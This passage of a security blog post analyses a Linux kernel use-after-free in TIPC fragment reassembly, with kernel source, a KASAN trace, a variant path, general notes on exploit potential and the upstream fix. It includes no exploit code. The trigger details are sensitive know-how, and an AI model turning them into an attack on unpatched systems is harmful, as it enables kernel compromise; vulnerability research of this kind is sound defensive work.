</span></span><span class="line"><span class="cl">	<span class="kt">bool</span> <span class="n">headstolen</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">frag</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">msg</span> <span class="o">=</span> <span class="nf">buf_msg</span><span class="p">(</span><span class="n">frag</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">fragid</span> <span class="o">=</span> <span class="nf">msg_type</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>                                     <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="n">frag</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="nf">skb_pull</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="nf">msg_hdr_sz</span><span class="p">(</span><span class="n">msg</span><span class="p">));</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">fragid</span> <span class="o">==</span> <span class="n">FIRST_FRAGMENT</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="n">head</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">skb_has_frag_list</span><span class="p">(</span><span class="n">frag</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nf">__skb_linearize</span><span class="p">(</span><span class="n">frag</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">frag</span> <span class="o">=</span> <span class="nf">skb_unshare</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">GFP_ATOMIC</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">frag</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">head</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>                                 <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">head</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">skb_try_coalesce</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="n">frag</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">headstolen</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">delta</span><span class="p">))</span> <span class="p">{</span>    <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="nf">kfree_skb_partial</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">headstolen</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>                                                    <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="n">tail</span> <span class="o">=</span> <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">skb_has_frag_list</span><span class="p">(</span><span class="n">head</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="nf">skb_shinfo</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frag_list</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">else</span>
</span></span><span class="line"><span class="cl">			<span class="n">tail</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">head</span><span class="o">-&gt;</span><span class="n">truesize</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">truesize</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">head</span><span class="o">-&gt;</span><span class="n">data_len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">head</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">fragid</span> <span class="o">==</span> <span class="n">LAST_FRAGMENT</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">validated</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">tipc_msg_validate</span><span class="p">(</span><span class="o">&amp;</span><span class="n">head</span><span class="p">)))</span>                <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>                                           <span class="p">[</span><span class="mi">5</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nl">err</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">	<span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">buf</span><span class="p">);</span>                                            <span class="p">[</span><span class="mi">6</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">headbuf</span><span class="p">);</span>                                        <span class="p">[</span><span class="mi">7</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/msg.c#L124">net/tipc/msg.c</a> (6.7.4)</p>
<p>Walking through a typical case, when the first fragment is received <code>tipc_buf_append()</code> is called with <code>*headbuf == NULL</code> &amp; <code>*buf</code> pointing to the packet buffer of the first fragment. Note the fragment id (first, last or other) is stored in the TIPC header [0].</p>
<p>For the first fragment, some checks are done and this buffer is used to initialise <code>heabuf</code> [1] and it returns. For subsequent fragments in this sequence, <code>heabuf</code> is now initialised when <code>tipc_buf_append()</code> is called. These packets are then either coalesced into the head buffer [2] or added to its the <code>frag_list</code> [3].</p>
<p>Finally when the <code>LAST_FRAGMENT</code> is processed, added to the chain, the header of the initially fragmented packet is validated [4]. If you recall, the fragmented message is stored within the <code>MSG_FRAGMENTER</code> messages, so will have its own header that hasn&rsquo;t been validated yet.</p>
<p>Notably, if this fails (e.g. we intentionally scuff up the header of the fragmented message), both the buffers are dropped [5] [6]. At this point <code>buf</code> points to the last fragment and <code>headbuf</code> points to the head buffer (the first fragment). It is possible for <code>buf</code> to be in the <code>frag_list</code> of <code>headbuf</code> at this point as we&rsquo;ve seen.</p>
<p>However, <code>kfree_skb()</code> isn&rsquo;t a simple <code>kfree()</code> wrapper, due to the complexity of <code>struct sk_buff</code>. It involves quite a bit of cleanup, including cleaning up the fragments reference by the <code>frag_list</code> &hellip; you can probably see where this is going!</p>
<p>The last fragment, <code>buf</code>, is freed [6]. Then, the head buffer is freed [7] whereby its <code>frag_list</code> is iterated for cleanup, leading to a use-after-free, as the final fragment has just been freed prior to this call [6]!</p>
<p>We can see this buy exploring the rest of the call trace when we trigger the bug:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[   48.900496] ==================================================================
</span></span><span class="line"><span class="cl">[   48.901414] BUG: KASAN: slab-use-after-free in kfree_skb_list_reason+0x549/0x5c0
</span></span><span class="line"><span class="cl">[   48.902395] Read of size 8 at addr ffff88800927c900 by task syz_test/207
</span></span><span class="line"><span class="cl">[   48.903256] 
</span></span><span class="line"><span class="cl">[   48.903450] CPU: 1 PID: 207 Comm: syz_test Not tainted 6.7.4-gd09175322cfa-dirty #6
</span></span><span class="line"><span class="cl">[   48.904221] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
</span></span><span class="line"><span class="cl">[   48.905046] Call Trace:
</span></span><span class="line"><span class="cl">[   48.905306]  &lt;IRQ&gt;
</span></span><span class="line"><span class="cl">[   48.905490]  dump_stack_lvl+0x72/0xa0
</span></span><span class="line"><span class="cl">[   48.905787]  print_report+0xcc/0x620
</span></span><span class="line"><span class="cl">[   48.906736]  kasan_report+0xb0/0xe0
</span></span><span class="line"><span class="cl">[   48.907096]  kfree_skb_list_reason+0x549/0x5c0
</span></span><span class="line"><span class="cl">[   48.909613]  skb_release_data.isra.0+0x4fd/0x850
</span></span><span class="line"><span class="cl">[   48.909997]  kfree_skb_reason+0xf4/0x380
</span></span><span class="line"><span class="cl">[   48.910171]  tipc_buf_append+0x3e4/0xad0
</span></span></code></pre></div><p>The site that triggers KASAN is when the fragmented buffer list is iterated during <code>kfree_skb_list_reason()</code>. It is passed the <code>frag_list</code> of the head buffer in <code>skb_release_data()</code> [0]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">static</span> <span class="kt">void</span> <span class="nf">skb_release_data</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">enum</span> <span class="n">skb_drop_reason</span> <span class="n">reason</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			     <span class="kt">bool</span> <span class="n">napi_safe</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">skb_shared_info</span> <span class="o">*</span><span class="n">shinfo</span> <span class="o">=</span> <span class="nf">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="c1">// snip
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nl">free_head</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">shinfo</span><span class="o">-&gt;</span><span class="n">frag_list</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="nf">kfree_skb_list_reason</span><span class="p">(</span><span class="n">shinfo</span><span class="o">-&gt;</span><span class="n">frag_list</span><span class="p">,</span> <span class="n">reason</span><span class="p">);</span>                       <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/core/skbuff.c#L966">net/core/skbuff.c</a> (6.7.4)</p>
<p>We can then see the KASAN trigger in <code>kfree_skb_list_reason()</code> here [1]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="n">__fix_address</span>
</span></span><span class="line"><span class="cl"><span class="nf">kfree_skb_list_reason</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">segs</span><span class="p">,</span> <span class="k">enum</span> <span class="n">skb_drop_reason</span> <span class="n">reason</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">skb_free_array</span> <span class="n">sa</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">sa</span><span class="p">.</span><span class="n">skb_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">while</span> <span class="p">(</span><span class="n">segs</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">next</span> <span class="o">=</span> <span class="n">segs</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>                                      <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">__kfree_skb_reason</span><span class="p">(</span><span class="n">segs</span><span class="p">,</span> <span class="n">reason</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="nf">skb_poison_list</span><span class="p">(</span><span class="n">segs</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="nf">kfree_skb_add_bulk</span><span class="p">(</span><span class="n">segs</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sa</span><span class="p">,</span> <span class="n">reason</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="n">segs</span> <span class="o">=</span> <span class="n">next</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">sa</span><span class="p">.</span><span class="n">skb_count</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="nf">kmem_cache_free_bulk</span><span class="p">(</span><span class="n">skbuff_cache</span><span class="p">,</span> <span class="n">sa</span><span class="p">.</span><span class="n">skb_count</span><span class="p">,</span> <span class="n">sa</span><span class="p">.</span><span class="n">skb_array</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/core/skbuff.c#L1140">net/core/skbuff.c</a> (6.7.4)</p>
<h3 id="variations">Variations</h3>
<p><img src="https://sam4k.com/content/images/2024/04/there-smore.gif" alt=""></p>
<p>There&rsquo;s a couple of variations to this vulnerability which are worth mentioning. First of all, the vulnerable path can also be reached in a very similar manner via <code>TUNNEL_PROTOCOL</code> messages, as seen in this call trace:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">kfree_skb_reason+0xf4/0x380 net/core/skbuff.c:1108
</span></span><span class="line"><span class="cl">kfree_skb include/linux/skbuff.h:1234 [inline]
</span></span><span class="line"><span class="cl">tipc_buf_append+0x3ce/0xb50 net/tipc/msg.c:186
</span></span><span class="line"><span class="cl">tipc_link_tnl_rcv net/tipc/link.c:1398 [inline]
</span></span><span class="line"><span class="cl">tipc_link_rcv+0x1a89/0x2dc0 net/tipc/link.c:1837
</span></span><span class="line"><span class="cl">tipc_rcv+0x1220/0x3030 net/tipc/node.c:2173
</span></span><span class="line"><span class="cl">tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
</span></span></code></pre></div><p>Additionally, some eagle eyed readers may also have noticed there&rsquo;s another way to trigger the use-after-free within <code>tipc_buf_append()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">tipc_buf_append</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">headbuf</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">buf</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="c1">// snip
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nf">skb_try_coalesce</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="n">frag</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">headstolen</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">delta</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">kfree_skb_partial</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">headstolen</span><span class="p">);</span>                        <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="n">tail</span> <span class="o">=</span> <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">skb_has_frag_list</span><span class="p">(</span><span class="n">head</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="nf">skb_shinfo</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frag_list</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span>
</span></span><span class="line"><span class="cl">            <span class="n">tail</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">truesize</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">truesize</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">data_len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">fragid</span> <span class="o">==</span> <span class="n">LAST_FRAGMENT</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">validated</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">tipc_msg_validate</span><span class="p">(</span><span class="o">&amp;</span><span class="n">head</span><span class="p">)))</span>
</span></span><span class="line"><span class="cl">            <span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nl">err</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">buf</span><span class="p">);</span>                                                <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">headbuf</span><span class="p">);</span>                                            <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/msg.c#L124">net/tipc/msg.c</a> (6.7.4)</p>
<p>The initial free can occur at either site [0] or [1]. We&rsquo;ve covered the latter case, but if the last fragment was coalesced, then the initial free occurs at [0] instead.</p>
<hr>
<ol>
<li><a href="http://tipc.io/protocol.html">TIPC Protocol: 7.2.7. Message Fragmentation</a></li>
</ol>
<h2 id="exploitation">Exploitation</h2>
<p><img src="https://sam4k.com/content/images/2024/07/i_failed_you.gif" alt=""></p>
<p>Unfortunately I haven&rsquo;t had the time to work on putting together an exploit for this vulnerability, though I&rsquo;d love to set some time aside in the future. Sorry! :(</p>
<p>From an LPE perspective, the use-after-free of a <code>struct sk_buff</code> provides a pretty nice primitive due to its complexity and usage. There&rsquo;s been some nice write-ups in the past making good use of the structure for LPE, so check those out if interested<img src="https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-0920.html" alt="[1]"><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">[2]</a></p>
<p>The RCE side of things is more opaque and something I&rsquo;m really keen to explore more. Two major roadblocks for Linux kernel RCE are: KASLR and the drastically reduced surface for heap fengshui and generally affecting device state.</p>
<p>At least on the latter, we have some nice flexibility with this vulnerability. We have some control over the affected caches via our TIPC messages. The defer queue could potentially be used to introduce delays and control when objects are freed. Who knows!</p>
<hr>
<ol>
<li><a href="https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-0920.html">CVE-2021-0920: Android sk_buff use-after-free in Linux</a></li>
<li><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel</a></li>
</ol>
<p>Here are some posts on other TIPC related bugs and stuff for interested readers:</p>
<ol>
<li><a href="https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/">CVE-2021-43267: Remote Linux Kernel Heap Overflow</a> by <a href="https://twitter.com/maxpl0it">@maxpl0it</a></li>
<li><a href="https://haxx.in/posts/pwning-tipc/">Exploiting CVE-2021-43267</a> by <a href="https://twitter.com/bl4sty">@bl4sty</a></li>
<li><a href="https://sam4k.com/cve-2022-0435-a-remote-stack-overflow-in-the-linux-kernel/">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</a> by me</li>
</ol>
<h2 id="fix-remediation">Fix + Remediation</h2>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">---
</span></span><span class="line"><span class="cl"> net/tipc/msg.c | 6 +++++-
</span></span><span class="line"><span class="cl"> 1 file changed, 5 insertions(+), 1 deletion(-)
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">diff --git a/net/tipc/msg.c b/net/tipc/msg.c
</span></span><span class="line"><span class="cl">index 5c9fd4791c4ba1..9a6e9bcbf69402 100644
</span></span><span class="line"><span class="cl">--- a/net/tipc/msg.c
</span></span><span class="line"><span class="cl">+++ b/net/tipc/msg.c
</span></span><span class="line"><span class="cl">@@ -156,6 +156,11 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
</span></span><span class="line"><span class="cl"> 	if (!head)
</span></span><span class="line"><span class="cl"> 		goto err;
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl">+	/* Either the input skb ownership is transferred to headskb
</span></span><span class="line"><span class="cl">+	 * or the input skb is freed, clear the reference to avoid
</span></span><span class="line"><span class="cl">+	 * bad access on error path.
</span></span><span class="line"><span class="cl">+	 */
</span></span><span class="line"><span class="cl">+	*buf = NULL;
</span></span><span class="line"><span class="cl"> 	if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {
</span></span><span class="line"><span class="cl"> 		kfree_skb_partial(frag, headstolen);
</span></span><span class="line"><span class="cl"> 	} else {
</span></span><span class="line"><span class="cl">@@ -179,7 +184,6 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
</span></span><span class="line"><span class="cl"> 		*headbuf = NULL;
</span></span><span class="line"><span class="cl"> 		return 1;
</span></span><span class="line"><span class="cl"> 	}
</span></span><span class="line"><span class="cl">-	*buf = NULL;
</span></span><span class="line"><span class="cl"> 	return 0;
</span></span><span class="line"><span class="cl"> err:
</span></span><span class="line"><span class="cl"> 	kfree_skb(*buf);
</span></span></code></pre></div><p>Commit <a href="https://github.com/torvalds/linux/commit/080cbb890286cd794f1ee788bbc5463e2deb7c2b">080cbb890286</a>, authored by <a href="https://github.com/torvalds/linux/commits?author=kuba-moo">kuba-moo</a></p>
<p>We can see the patch is fairly simple (even if the context is not): the reference to the input skb ( <code>buf</code> ) is cleared before the error case that can cause the UAF. This is because the block handling the fragment coalescing/chaining already does the appropriate cleanup for it via <code>frag</code> (which at this point is also a reference to the input skb).</p>
<p>It&rsquo;s a bit clearer if we provide some more context:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">    <span class="cm">/* Either the input skb ownership is transferred to headskb
</span></span></span><span class="line"><span class="cl"><span class="cm">     * or the input skb is freed, clear the reference to avoid
</span></span></span><span class="line"><span class="cl"><span class="cm">     * bad access on error path.
</span></span></span><span class="line"><span class="cl"><span class="cm">     */</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nf">skb_try_coalesce</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="n">frag</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">headstolen</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">delta</span><span class="p">))</span> <span class="p">{</span>  <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
